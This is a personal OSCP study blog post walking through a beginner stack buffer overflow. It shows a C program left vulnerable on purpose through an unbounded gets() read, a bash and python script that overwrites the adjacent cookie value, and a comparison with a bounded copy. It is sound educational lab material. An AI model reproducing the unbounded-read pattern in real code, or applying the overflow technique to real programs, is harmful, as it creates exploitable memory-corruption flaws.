Saturday, May 1, 2021

Buffer Overflow essentials

Hi Everyone,


I start my new OSCP blog with content that people don't usually share, but it is a technical skill that you should, of course, learn in order to pass the OSCP certification (25 points of the final mark).

What is a Buffer overflow?

A buffer overflow (buffer overrun) is a software error that occurs when a program does not check the size of the data entered by the user against the size of the buffer that receives it.

This kind of vulnerability allows an attacker to overwrite memory beyond the buffer, including values the program relies on at a low level for its control flow, and take control of the program's execution.

You can find the complete description of this attack at the following link:

https://en.wikipedia.org/wiki/Buffer_overflow


Practice with Buffer overflow essentials:


To learn about buffer overflows we are going to use a simple code example that I know contains this kind of vulnerability.

#include <stdio.h>

int main(){

    int cookie;        /* never initialised: holds whatever was already on the stack */
    char buf[80];      /* 80-byte buffer that gets() fills without any bound check */

    /* print the addresses of both variables (%08x is fine for the 32-bit build used below) */
    printf("buf: %08x cookie: %08x \n", &buf, &cookie);
    gets(buf);         /* vulnerable: reads until newline, never checks the size */

    if(cookie == 0x41424344){
        printf("You win\n");
    }

    return 0;
}

This is the simplest example you can find to understand how memory gets overwritten. In the code there are two variables, cookie and buf:

        int cookie;
        char buf[80];

The cookie variable is an uninitialised integer and buf is a buffer that holds 80 bytes of input data.

When executed, the program first prints the memory addresses of the buf and cookie variables:

./executable 
buf: ffc20ba0 cookie: ffc20bf0
My input data user entry........over write the memory 

The gets function reads the user's input into buf. Exploiting this code is simple: you only need to understand that cookie sits at its own memory position:

        cookie: ffc20bf0

and that its (uninitialised) value is not the value the condition compares it against:

        if(cookie == 0x41424344){
            printf("You win\n");
        }

For this reason the program does not print "You win", and making it do so is our objective.





How can we exploit this vulnerability?

The strategy to overwrite the memory and manipulate the flow of the program is to enter the right number of characters into the buffer through the vulnerable gets function: first fill the 80 bytes of buf, then let the bytes that follow spill into cookie.

Overwrite the buffer content:

Once the input has spilled past the end of buf, the next four bytes land in cookie. The program then reaches the if instruction and evaluates whether the content of the cookie variable equals 0x41424344; if it does, it prints "You win" on the program's standard output file descriptor.


Exploiting:

Design of your first exploit:

The chosen development language is bash (Linux scripting), but to exploit the binary at run time the script makes one call to python in order to build the right input pattern:

Code Explanation:

Introduction:
#!/bin/bash -x
# bash header with -x (debug option: print each command as it runs)

INPUT_FILE=$1       # first program argument: the C source file
OUTPUT_BINARY=$2    # second program argument: name of the binary to build

echo -e "\tInit process........"
echo "examine : $INPUT_FILE"   # show data

Binary creation with gcc from the source code (32-bit, no PIE, no stack protector, executable stack, debug symbols, and -mpreferred-stack-boundary=2 so the stack is 4-byte aligned and no padding is inserted between the variables); objdump then shows the compiled if condition:

gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack $INPUT_FILE -o $OUTPUT_BINARY 2>/dev/null && objdump -S $OUTPUT_BINARY | grep -A 4  "cookie == "

After building the binary we reach the most important part of the process for understanding the buffer overflow: with some assembler knowledge and the objdump tool you can find the point in the code that evaluates the if condition:



Obtain the comparison value in little endian (the processor's byte order):

export DIR=`objdump -S $OUTPUT_BINARY |grep -A 3 "cookie ==" | grep cmp | awk '{print "\x"$3"\x"$4"\x"$5"\x"$6}'`
# the compare is encoded as "3d 44 43 42 41" (cmp eax, 0x41424344), so objdump fields 3-6
# are the immediate's bytes already in little-endian order: DIR becomes \x44\x43\x42\x41
echo "Dir overflow ... $DIR"
echo -e "\tInit exploit ......."

Exploiting Execution:
python3 -c "print(\"A\"*80+\"`echo $DIR`\")" | ./$OUTPUT_BINARY
# python turns the \x escapes into the bytes "DCBA": 80 'A's followed by the cookie value

Obviously you can also do this by hand:

python3 -c "print(\"A\"*80+\"<Your exploiting memory content>\")"

Compilation:
gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack stack.c -o test

Execution:
./test
buf: ffb78750 cookie: ffb787a0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA
you win!

Solution:
"A" x 80 + 0x41424344. The hex bytes 41 42 43 44 are the characters ABCD:
echo "41424344" | xxd -p -r && echo
ABCD
Written in little-endian order they become DCBA, which gives the final input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA
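The strategy section and the Solution above describe the same layout: 80 bytes fill buf and the next four land in cookie. The following C program is an added example, not code from the original post; it models that frame as a struct and uses hypothetical helpers (vulnerable_fill, hardened_fill, build_payload) to show the gets-style unbounded copy reaching the cookie next to a bounded fgets-style copy that never does.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the post's stack frame: 80-byte buffer immediately followed by the cookie. */
struct frame { char buf[80]; uint32_t cookie; };

/* Little-endian encoding: 0x41424344 -> 44 43 42 41 ("DCBA"), the bytes the awk step extracts. */
void le_bytes(uint32_t value, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* The post's payload: 80 'A's followed by the cookie value in little-endian order. */
size_t build_payload(unsigned char *out, size_t cap, uint32_t cookie) {
    if (cap < 84) return 0;
    memset(out, 'A', 80);
    le_bytes(cookie, out + 80);
    return 84;
}

/* Unbounded fill, the behaviour of gets(): every input byte lands in the frame, so payload
 * bytes 80..83 overwrite cookie (len is clamped only to keep this model well-defined). */
uint32_t vulnerable_fill(const unsigned char *input, size_t len) {
    struct frame f = { {0}, 0 };
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, input, len);
    return f.cookie;
}

/* Bounded fill, what fgets(buf, sizeof buf, stdin) gives: at most 79 bytes plus a
 * terminator go into buf, so cookie keeps its original value. */
uint32_t hardened_fill(const unsigned char *input, size_t len) {
    struct frame f = { {0}, 0 };
    size_t n = len < sizeof f.buf - 1 ? len : sizeof f.buf - 1;
    memcpy(f.buf, input, n);
    f.buf[n] = '\0';
    return f.cookie;
}

int main(void) {
    unsigned char payload[84];
    size_t n = build_payload(payload, sizeof payload, 0x41424344u);
    printf("gets-style fill:  cookie = %08x\n", vulnerable_fill(payload, n));
    printf("fgets-style fill: cookie = %08x\n", hardened_fill(payload, n));
    return 0;
}
```

On a little-endian machine the first line prints 41424344 (the "You win" value) and the second prints 00000000, because the bounded copy stops before the cookie.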

And that is all for this tutorial; I hope it is useful for the people who want to learn the basic overflow concepts.
I want to increase the content and level ;)


